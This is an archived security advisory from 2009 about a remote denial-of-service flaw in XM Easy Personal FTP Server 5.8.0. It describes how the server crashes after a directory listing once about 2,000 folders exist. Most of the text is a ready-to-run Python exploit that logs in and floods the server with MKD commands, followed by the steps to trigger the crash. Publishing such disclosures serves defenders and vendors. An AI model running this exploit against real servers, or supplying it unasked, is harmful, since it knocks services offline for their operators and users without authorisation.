AOH :: HP Unsorted X :: BT-22035.HTM

XM Easy Personal FTP Server Remote DoS Vulnerability



XM Easy Personal FTP Server Remote DoS Vulnerability
XM Easy Personal FTP Server Remote DoS Vulnerability



Date of Discovery: 24-Nov-2009=0D
=0D
Credits:leinakesi[at]gmail.com=0D
=0D
Vendor: Dxmsoft=0D
*******************************************************************************=0D
Affected:=0D
=0D
	XM Easy Personal FTP Server 5.8.0=0D
	Earlier versions may also be affected=0D
*******************************************************************************=0D
Overview:=0D
=0D
	XM Easy Personal FTP Server failed to handle more than 2000 files or folders in =0D
=0D
the root directory.=0D
*******************************************************************************=0D
Details:=0D
=0D
	if you could log on the server, take the following steps and the server will =0D
=0D
crash which lead to DoS.=0D
	=0D
	1.upload 2000 files or folders.=0D
	2.close the current connection.=0D
	3.use a ftp client to reconnect the server.=0D
		user ...=0D
		pass ...=0D
		port ...=0D
		list ...=0D
		crash!!!!!!=0D
*******************************************************************************=0D
Exploit example:=0D
=0D
1.upload 2000 folders.=0D
#!/usr/bin/python=0D
import socket=0D
import sys=0D
=0D
def Usage():=0D
    print ("Usage:  ./expl.py        \n")=0D
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")=0D
if len(sys.argv) <> 4:=0D
        Usage()=0D
        sys.exit(1)=0D
else:=0D
    hostname=sys.argv[1]=0D
    username=sys.argv[2]=0D
    passwd=sys.argv[3]=0D
    test_string='a'=0D
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)=0D
    try:=0D
        sock.connect((hostname, 21))=0D
    except:=0D
        print ("Connection error!")=0D
        sys.exit(1)=0D
    r=sock.recv(1024)=0D
    sock.send("user %s\r\n" %username)=0D
    r=sock.recv(1024)=0D
    sock.send("pass %s\r\n" %passwd)=0D
=0D
    for i in range(1,200):=0D
         sock.send("mkd " + "a" * i +"\r\n")=0D
         print "[-] " + ("mkd " + "a" * i +"\r\n")=0D
         r=sock.recv(1024)=0D
         print "[+] " + r + "\r\n"=0D
    for i in range(1,200):=0D
         sock.send("mkd " + "b" * i +"\r\n")=0D
         print "[-] " + ("mkd " + "b" * i +"\r\n")=0D
         r=sock.recv(1024)=0D
         print "[+] " + r + "\r\n"=0D
    for i in range(1,200):=0D
         sock.send("mkd " + "c" * i +"\r\n")=0D
         print "[-] " + ("mkd " + "c" * i +"\r\n")=0D
         r=sock.recv(1024)=0D
         print "[+] " + r + "\r\n"=0D
    for i in range(1,200):=0D
         sock.send("mkd " + "d" * i +"\r\n")=0D
         print "[-] " + ("mkd " + "d" * i +"\r\n")=0D
         r=sock.recv(1024)=0D
         print "[+] " + r + "\r\n"=0D
    for i in range(1,200):=0D
         sock.send("mkd " + "e" * i +"\r\n")=0D
         print "[-] " + ("mkd " + "e" * i +"\r\n")=0D
         r=sock.recv(1024)=0D
         print "[+] " + r + "\r\n"=0D
    for i in range(1,200):=0D
         sock.send("mkd " + "f" * i +"\r\n")=0D
         print "[-] " + ("mkd " + "f" * i +"\r\n")=0D
         r=sock.recv(1024)=0D
         print "[+] " + r + "\r\n"=0D
    for i in range(1,200):=0D
         sock.send("mkd " + "g" * i +"\r\n")=0D
         print "[-] " + ("mkd " + "g" * i +"\r\n")=0D
         r=sock.recv(1024)=0D
         print "[+] " + r + "\r\n"=0D
    for i in range(1,200):=0D
         sock.send("mkd " + "h" * i +"\r\n")=0D
         print "[-] " + ("mkd " + "h" * i +"\r\n")=0D
         r=sock.recv(1024)=0D
         print "[+] " + r + "\r\n"=0D
    for i in range(1,200):=0D
         sock.send("mkd " + "i" * i +"\r\n")=0D
         print "[-] " + ("mkd " + "i" * i +"\r\n")=0D
         r=sock.recv(1024)=0D
         print "[+] " + r + "\r\n"=0D
    for i in range(1,200):=0D
         sock.send("mkd " + "j" * i +"\r\n")=0D
         print "[-] " + ("mkd " + "j" * i +"\r\n")=0D
         r=sock.recv(1024)=0D
         print "[+] " + r + "\r\n"=0D
=0D
    sock.close()=0D
    sys.exit(0);=0D
=0D
2.use a ftp client to reconnect the server=0D
for example:=0D
start->run->cmd->ftp 127.0.0.1->*****->*****->dir=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.